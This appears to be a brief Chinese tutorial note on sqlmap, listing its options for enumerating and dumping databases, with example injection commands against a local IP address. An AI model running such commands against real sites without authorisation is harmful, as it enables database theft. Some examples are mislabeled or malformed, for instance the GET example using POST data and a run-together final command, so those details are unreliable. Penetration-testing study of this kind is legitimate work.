sqlmap的使用

sqlmap的参数

--batch：在所有需要用户输入的部分执行默认操作，无需用户再输入。
--level: 设置测试的级别，范围从 1 到 5。默认情况下，sqlmap 使用 --level=1。
--risk : 设置测试的风险级别，范围从 1 到 3
 -v    : 输出的详细程度,有0-6级别。

--dbs:获取所有数据库
--tables:获取所有数据表
--columns:获取所有字段
--dump:打印数据
--current-db:列出当前数据库
--forms:自动填写表单注入
--threads: 设置并发线程数，提高测试速度。
-random-agent:使用随机user-agent进行测试

-D:查询选择某个库
-T:查询选择某个表
-C:查询选择某个字段

get 传参

例：python sqlmap.py -u "http://192.168.131.19/select.php" --data="id=1" --batch --dbs
   sqlmap -u "http://192.168.131.19/select.php" --data="id=1" --batch --dbs

post 传参

-将数包存入一文件中

sqlmap -r [文件路径] -p [指定参数] --dbs

• 在表单里需要检测的参数后加*等同与 -p

其它参数

sqlmap.py -u"http:// *"--data="a=b"-p a --level3--random-agent --referer="a" --technique T --dbms=mysql --cookie="cookie"--tables